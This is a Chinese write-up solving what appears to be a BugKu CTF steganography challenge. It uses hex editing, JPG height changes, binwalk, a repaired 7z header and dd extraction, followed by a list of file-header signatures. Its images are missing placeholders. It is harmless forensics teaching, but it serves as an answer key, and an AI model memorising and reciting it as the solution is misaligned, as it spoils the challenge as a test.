1、用010打开图片,发现是由两张图片组成的,在两张图片的头尾交接处发现有一串二进制的数,尝试将他转为Ascii码得到一串字符mynameiskey!!!hhh

2、到这里思路断了,尝试去改高度,百度后发现JPG的高度是在16进制FFC2处再往后三个字节就是图片大小尺寸

普通的JPG的图片大小尺寸都在FFC2后三个字节处开始,总共就两个字节

[外链图片转存中…(img-FC1IvBoC-1608735278163)]

3、发现新大陆,有flag但有一部分被隐藏了,放到kali里binwalk下出来两张图,改下大小发现跟原来的一样flag有几个打了马赛克,在到两张图里去看看有没有隐藏信息,发现在FFD9图片结束尾部特征,二进制编码后面发现有个像 7z的文件标识头的东西,尝试去修复文件标识头改为37 7A BC AF 27 1C保存再到kali里去

[外链图片转存中…(img-94LmHb9Z-1608735278164)]

4、将这一段数据提取出来并保存为压缩包的格式命令为dd if=lunjian.jpg of=1.zip skip=9591 bs=1得到压缩包解压,再将图片更改高度发现与之前的flag遮挡有错位,组合得到flag

[外链图片转存中…(img-TLzba6ZW-1608735278166)]

kali里dd命令使用方法

使用dd命令分离文件,如:
dd if=hehe.jpg of=hehe1.zip bs=1 skip=54163
if=file(源文件)
of=file(输出文件)
bs=bytes(一次性转换bytes个字节,及转换缓冲区大小)
skip=blocks(输入文件开头跳过blocks个块再开始复制--通俗点讲就是从哪开始)

常见文件头标识

常见的文件头:
7z
文件头标识:37 7A BC AF 27 1C
JPEG/JPG
文件头标识: ff, d8 (SOI) (JPEG 文件标识) 
文件结束标识: ff, d9 (EOI) 
PNG
文件头标识:89 50 4E 47 0D 0A 1A 0A
GIF
文件头标识:47 49 46 38 39(37) 61 GIF89(7)a
BMP
文件头标识:42 4D--- BM
HTML (html)
文件头标识:68746D6C3E 
ZIP Archive (zip)
文件头标识:504B0304  PK
RAR Archive (rar)
文件头标识:52617221 
等等..

**0x027 >>>>>…

你可能感兴趣的:(CTF,BugKu,百度)